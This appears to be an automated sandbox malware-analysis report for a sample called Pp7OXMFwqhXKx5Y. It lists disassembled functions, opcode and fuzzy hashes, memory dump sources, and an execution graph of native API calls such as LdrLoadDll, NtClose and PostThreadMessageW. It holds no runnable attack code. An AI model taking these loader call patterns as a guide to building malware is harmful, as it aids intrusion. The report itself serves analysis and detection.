                                                                                                                                                                                                                                  • Opcode ID: ead75dfd39ad12e3746bb5af603e3f60d7cf27070db24d5e63f3552b2fc332d6
                                                                                                                                                                                                                                  • Instruction ID: 4beef5ae3cbbd509ec65f7a95bfb9f2f0f3433a0a1cbb58ca5aeb87172ddfd1e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ead75dfd39ad12e3746bb5af603e3f60d7cf27070db24d5e63f3552b2fc332d6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 25113DB5D003498FCB10DFAAC4457DEFBF9AF88324F148419C459A7240C7789945CFA0
                                                                                                                                                                                                                                  Function 0193B378 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0193B3DE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178878013804.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1930000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                                                                                                                  • Opcode ID: 34a120de6a5d89b78186bff17d02b26ac8e02212cb94c8d80f98d39a80a9c164
                                                                                                                                                                                                                                  • Instruction ID: a8b261ad3eaa21bc82feac09c0fdf3e6f4ddbe5dc4982ae924fac3d79b9ca9bc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 34a120de6a5d89b78186bff17d02b26ac8e02212cb94c8d80f98d39a80a9c164
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EA11E3B6C002598FDB10CF9AC484ADEFBF8EF88314F14841AD829A7600C379A545CFA1
                                                                                                                                                                                                                                  Function 07959111 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 07959175
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessagePost
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 410705778-0
                                                                                                                                                                                                                                  • Opcode ID: a38b9688940e48ae078e2ca3305a3b7d50b0234ad8d63bf79ad30c15f5de3754
                                                                                                                                                                                                                                  • Instruction ID: c39d75b514bac9c9593786b49799a83a96494549837ead9147d0331f78da7db9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a38b9688940e48ae078e2ca3305a3b7d50b0234ad8d63bf79ad30c15f5de3754
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 961106B6800359DFDB10CF99C584BDEBBF8FB48324F14841AD418A7600C378A544CFA1
                                                                                                                                                                                                                                  Function 07956014 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 07959175
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessagePost
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 410705778-0
                                                                                                                                                                                                                                  • Opcode ID: 8d7474b3171b1d6b094783d0e01b6a26fe3837f625972d868c66182b4fe8650c
                                                                                                                                                                                                                                  • Instruction ID: 4d2539c26b57598589f46047004dc53f0b9e946958d857f17ac0e29065592a95
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d7474b3171b1d6b094783d0e01b6a26fe3837f625972d868c66182b4fe8650c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE110AB5800359DFDB10CF9AC485BDEBBF8FB48324F108459D959A7201C378A944CFA1
                                                                                                                                                                                                                                  Function 0148D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178876969426.000000000148D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148D000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_148d000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 0966116369dd7ffd65733baa5fc057e06593442b0bb9b650a39dc083434e7080
                                                                                                                                                                                                                                  • Instruction ID: c12b1dd5a87c74e31f853456a81f9d647581ab17349a374e5e414d1ac0c4681a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0966116369dd7ffd65733baa5fc057e06593442b0bb9b650a39dc083434e7080
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE21F771900200DFDB15EF5CD8C0B6BBF65EB84714F24C57AD8090B3A6C33AE456CAA1
                                                                                                                                                                                                                                  Function 0149D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178877032417.000000000149D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0149D000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_149d000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 55eebd8562617954ee76aff67a889a94f98815f7dc0337bcecaa9dbbfcc1675c
                                                                                                                                                                                                                                  • Instruction ID: 0edd24994818dcfce1b7a547b810052d3fa44c1c7aa2116c74c8d4138a109d20
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 55eebd8562617954ee76aff67a889a94f98815f7dc0337bcecaa9dbbfcc1675c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B21F5B1904240DFDF15DF68D8C4B26BF65EB84358F24C56AD80A4B366C33AD447CA61
                                                                                                                                                                                                                                  Function 0149D006 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178877032417.000000000149D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0149D000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_149d000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 1bb595ad7a27572acca9a3617940a3b509a1b5163ba40eb7019593c0c316f775
                                                                                                                                                                                                                                  • Instruction ID: d8987a3a28664f3ac82986704f125d75a8384d08c48005a5fafdc7bcb8c0ff7e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1bb595ad7a27572acca9a3617940a3b509a1b5163ba40eb7019593c0c316f775
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF2192759093808FDB17CF64D994716BF71EB46214F28C5DBD8498F2A7C33A980ACB62
                                                                                                                                                                                                                                  Function 0148D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178876969426.000000000148D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148D000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_148d000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: f59b0871c0682c2100be4a44fe0d39458cda5ba81305f5cc74bbe6f66b0d13c9
                                                                                                                                                                                                                                  • Instruction ID: e5cd49aceff29e437163a260197ab06b71f43506f50fe49bab6cd51cea6ed9e6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f59b0871c0682c2100be4a44fe0d39458cda5ba81305f5cc74bbe6f66b0d13c9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F11D272804240DFDB12DF48D9C0B5ABF71FB84310F2486AAD8090B266C33AD45ACB91
                                                                                                                                                                                                                                  Function 0148D731 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178876969426.000000000148D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148D000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_148d000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: d75d0ac8d8a3a89ee5768eff8bb8396b3b32d143e21d262b94e9652829e63685
                                                                                                                                                                                                                                  • Instruction ID: 0cf2868fe16495b6d71635522031e92452aef735ebf50f4b74f341360d4ed464
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d75d0ac8d8a3a89ee5768eff8bb8396b3b32d143e21d262b94e9652829e63685
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9001A771806384AAE7117E69CCC4B7BFF98EF45334F18846BED454A2D2D27D9840D671
                                                                                                                                                                                                                                  Function 0148D730 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178876969426.000000000148D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148D000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_148d000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: fc38893031760a7433223802ca7e9d586a4b22468c701b796e2fe41e595338f4
                                                                                                                                                                                                                                  • Instruction ID: f0c394f2a0a1f7c819e92a85408e3e669c6284fd1f9e9c2f5cd767635552ed80
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc38893031760a7433223802ca7e9d586a4b22468c701b796e2fe41e595338f4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2DF0C272805284AEE7119E1AC8C4B67FF98EB85334F18C46AED080B292C2789844CA70

                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                  Function 07959F40 Relevance: .3, Instructions: 349COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 3710cf3b956425d8b96ae64df5fbae604cb5efe6b64d38257175a5aa248ec2b0
                                                                                                                                                                                                                                  • Instruction ID: 46a75d429ce83672e5cdcca9a537617d121665c838a09f860e1c32ca059c86db
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3710cf3b956425d8b96ae64df5fbae604cb5efe6b64d38257175a5aa248ec2b0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0D1BAB07016128FDB29DB75C450B6EBBFAAFC9608F14856DC94ADB290CF35E802CB55
                                                                                                                                                                                                                                  Function 07956630 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: c8b0b3b50d7ffe5043f76c32e8377e52636103002f186b5e8111a929cf1be212
                                                                                                                                                                                                                                  • Instruction ID: 03e2b70227a9c227cf90ce27cb9152e0dc02c5907b25c7608e992688c721a1d0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8b0b3b50d7ffe5043f76c32e8377e52636103002f186b5e8111a929cf1be212
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5FE117B4E002298FDB14DFA8C5919AEFBB2FF89304F648169D915AB356D730AD41CF60
                                                                                                                                                                                                                                  Function 07954110 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: bdeda050b9210a39f0df5d6bf71d59e3ab8d0b6b1729af6086d58c33ece81e9a
                                                                                                                                                                                                                                  • Instruction ID: fa46010d39ef53d23f9b75c2858bdd00d7f3eef3f3d7cc9ccd8e24f3f3fe2cd9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bdeda050b9210a39f0df5d6bf71d59e3ab8d0b6b1729af6086d58c33ece81e9a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BCE119B4E005698FDB14DF99C5809AEBBF6FF89304F248169D815AB366D730A981CF60
                                                                                                                                                                                                                                  Function 07955950 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: b68981c681e61c9545ac13c737da0f10f7316e8595ffafa3feee5fbf37b2a8b8
                                                                                                                                                                                                                                  • Instruction ID: dc72ec15f81b989997d0c14cac772010d174e2f53b129cb302e40b723d96806b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b68981c681e61c9545ac13c737da0f10f7316e8595ffafa3feee5fbf37b2a8b8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3DE1E6B4E002298FDB14DFA9C5919AEBBF6FF89304F248169D815AB356D730A941CF60
                                                                                                                                                                                                                                  Function 07954548 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 884afe6b7d07838d2cdeedcd96ce0d08e0974450361a6e526d58bc0f463b4cc8
                                                                                                                                                                                                                                  • Instruction ID: eea2255775ee0795c867c12e5a3461b0a4d31fafe9fb548b0981ca5b1c3686ed
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 884afe6b7d07838d2cdeedcd96ce0d08e0974450361a6e526d58bc0f463b4cc8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1AE129B4E001698FDB14DFA8C5919AEFBB2FF89304F248169D815AB326D730AD41CF60
                                                                                                                                                                                                                                  Function 07953CD8 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 90c6be11fc5d7ee56c1dbdd69f13a8187eddce3b4f9cce2adac29948c75f1fe6
                                                                                                                                                                                                                                  • Instruction ID: 1bae5ff394b75789bacfca8822328612e712fd2cd13a821be74d037662842efe
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 90c6be11fc5d7ee56c1dbdd69f13a8187eddce3b4f9cce2adac29948c75f1fe6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55E107B4E001698FDB14DFA9C5819AEBBB6FF89304F248169D815AB356D730AD41CFA0
                                                                                                                                                                                                                                  Function 0193DFE4 Relevance: .3, Instructions: 264COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178878013804.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1930000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 0050b2912fe96863b9ae9143990078dcaffffc22df8a406c7131ef88527ebada
                                                                                                                                                                                                                                  • Instruction ID: ffcba4d346415adf26966d5528e16340f70806caf4faaf44380091ceb564d490
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0050b2912fe96863b9ae9143990078dcaffffc22df8a406c7131ef88527ebada
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7A18132E0021ACFCF15DFB4C4845AEBBB6FFC4301B15456AE90AAB265DB71E915CB81
                                                                                                                                                                                                                                  Function 07953CC8 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: c1f36dd590d9a2894dfc4459be3395dc69c9d2eefc5d682378b77e30b7123363
                                                                                                                                                                                                                                  • Instruction ID: 13fa3f80c057bd0f79836ca171ba2a7e79b5e10797a0ffe8f93c53100b9310b1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c1f36dd590d9a2894dfc4459be3395dc69c9d2eefc5d682378b77e30b7123363
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40512BB4E002298FDB14DFA9C5815AEFBF6FF89344F248169D818A7356D7309941CFA1

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:1.4%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:5.8%
                                                                                                                                                                                                                                  Signature Coverage:8.6%
                                                                                                                                                                                                                                  Total number of Nodes:139
                                                                                                                                                                                                                                  Total number of Limit Nodes:10
                                                                                                                                                                                                                                  execution_graph 82866 424a03 82867 424a1f 82866->82867 82868 424a47 82867->82868 82869 424a5b 82867->82869 82871 42c713 NtClose 82868->82871 82876 42c713 82869->82876 82873 424a50 82871->82873 82872 424a64 82879 42e8d3 82872->82879 82875 424a6f 82877 42c72d 82876->82877 82878 42c73e NtClose 82877->82878 82878->82872 82882 42ca53 82879->82882 82881 42e8f0 82881->82875 82883 42ca6d 82882->82883 82884 42ca7e RtlAllocateHeap 82883->82884 82884->82881 82885 42f983 82886 42f8f3 82885->82886 82888 42f950 82886->82888 82891 42e893 82886->82891 82889 42f92d 82894 42e7b3 82889->82894 82892 42ca53 RtlAllocateHeap 82891->82892 82893 42e8ae 82892->82893 82893->82889 82897 42caa3 82894->82897 82896 42e7cc 82896->82888 82898 42cabd 82897->82898 82899 42cace RtlFreeHeap 82898->82899 82899->82896 82987 42f853 82988 42f863 82987->82988 82989 42f869 82987->82989 82990 42e893 RtlAllocateHeap 82989->82990 82991 42f88f 82990->82991 82992 424d93 82994 424dac 82992->82994 82993 424df7 82995 42e7b3 RtlFreeHeap 82993->82995 82994->82993 82997 424e37 82994->82997 82999 424e3c 82994->82999 82996 424e07 82995->82996 82998 42e7b3 RtlFreeHeap 82997->82998 82998->82999 83000 42bce3 83001 42bd00 83000->83001 83004 14e2d10 LdrInitializeThunk 83001->83004 83002 42bd28 83004->83002 83005 415a23 83006 415a48 83005->83006 83011 417823 83006->83011 83010 415aa0 83012 417847 83011->83012 83013 417883 LdrLoadDll 83012->83013 83014 415a7b 83012->83014 83013->83014 83014->83010 83015 419573 83014->83015 83016 4195a6 83015->83016 83017 4195ca 83016->83017 83022 42c263 83016->83022 83017->83010 83019 4195ed 83019->83017 83020 42c713 NtClose 83019->83020 83021 41966f 83020->83021 83021->83010 83023 42c27d 83022->83023 83026 14e2bc0 LdrInitializeThunk 83023->83026 83024 42c2a9 83024->83019 83026->83024 83027 413ba3 83030 42c9b3 83027->83030 83031 42c9cd 83030->83031 83034 14e2b90 LdrInitializeThunk 83031->83034 83032 413bc5 83034->83032 83043 4140f3 83044 414100 83043->83044 83045 417823 LdrLoadDll 83044->83045 83046 414127 83045->83046 83047 414173 83046->83047 83048 414160 PostThreadMessageW 83046->83048 83048->83047 82900 418dc8 82901 42c713 NtClose 82900->82901 82902 418dd2 82901->82902 82903 14e2a80 LdrInitializeThunk 82904 401b4f 82905 401b64 82904->82905 82908 42fd23 82905->82908 82911 42e373 82908->82911 82912 42e399 82911->82912 82923 407473 82912->82923 82914 42e3af 82922 401c13 82914->82922 82926 41b0e3 82914->82926 82916 42e3ce 82917 42e3e3 82916->82917 82941 42caf3 82916->82941 82937 428273 82917->82937 82920 42e3fd 82921 42caf3 ExitProcess 82920->82921 82921->82922 82925 407480 82923->82925 82944 4164e3 82923->82944 82925->82914 82927 41b10f 82926->82927 82962 41afd3 82927->82962 82930 41b13c 82931 41b147 82930->82931 82934 42c713 NtClose 82930->82934 82931->82916 82932 41b154 82933 41b170 82932->82933 82935 42c713 NtClose 82932->82935 82933->82916 82934->82931 82936 41b166 82935->82936 82936->82916 82938 4282d5 82937->82938 82940 4282e2 82938->82940 82973 418683 82938->82973 82940->82920 82942 42cb0d 82941->82942 82943 42cb1e ExitProcess 82942->82943 82943->82917 82945 416500 82944->82945 82947 416519 82945->82947 82948 42d193 82945->82948 82947->82925 82950 42d1ad 82948->82950 82949 42d1dc 82949->82947 82950->82949 82955 42bd33 82950->82955 82953 42e7b3 RtlFreeHeap 82954 42d24f 82953->82954 82954->82947 82956 42bd50 82955->82956 82959 14e2b2a 82956->82959 82957 42bd7c 82957->82953 82960 14e2b3f LdrInitializeThunk 82959->82960 82961 14e2b31 82959->82961 82960->82957 82961->82957 82963 41b0c9 82962->82963 82964 41afed 82962->82964 82963->82930 82963->82932 82968 42bdd3 82964->82968 82967 42c713 NtClose 82967->82963 82969 42bdf0 82968->82969 82972 14e34e0 LdrInitializeThunk 82969->82972 82970 41b0bd 82970->82967 82972->82970 82974 4186ad 82973->82974 82980 418bab 82974->82980 82981 413d83 82974->82981 82976 4187d4 82977 42e7b3 RtlFreeHeap 82976->82977 82976->82980 82978 4187ec 82977->82978 82979 42caf3 ExitProcess 82978->82979 82978->82980 82979->82980 82980->82940 82985 413da0 82981->82985 82983 413dfc 82983->82976 82984 413e06 82984->82976 82985->82984 82986 41b3f3 RtlFreeHeap LdrInitializeThunk 82985->82986 82986->82983

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 00417823 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 118 417823-41783f 119 417847-41784c 118->119 120 417842 call 42f393 118->120 121 417852-417860 call 42f993 119->121 122 41784e-417851 119->122 120->119 125 417870-417881 call 42de43 121->125 126 417862-41786d call 42fc33 121->126 131 417883-417897 LdrLoadDll 125->131 132 41789a-41789d 125->132 126->125 131->132
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417895
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179229670326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                                                                  • Opcode ID: 0396ba7618b5080a1dab921aa9300dfb6cdc16ec2d0a8df7c2b88b16f96075f0
                                                                                                                                                                                                                                  • Instruction ID: 29ab4178b623f9d5cb1a825787069ef2dd384c0f0d8505a4629b59b45d4eae07
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0396ba7618b5080a1dab921aa9300dfb6cdc16ec2d0a8df7c2b88b16f96075f0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC0152B5E0010DA7DF10EBA1DC42FDEB3789B54308F4041AAE90897241F634EB48CB95
                                                                                                                                                                                                                                  Function 0042C713 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 138 42c713-42c74c call 4048d3 call 42d983 NtClose
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C747
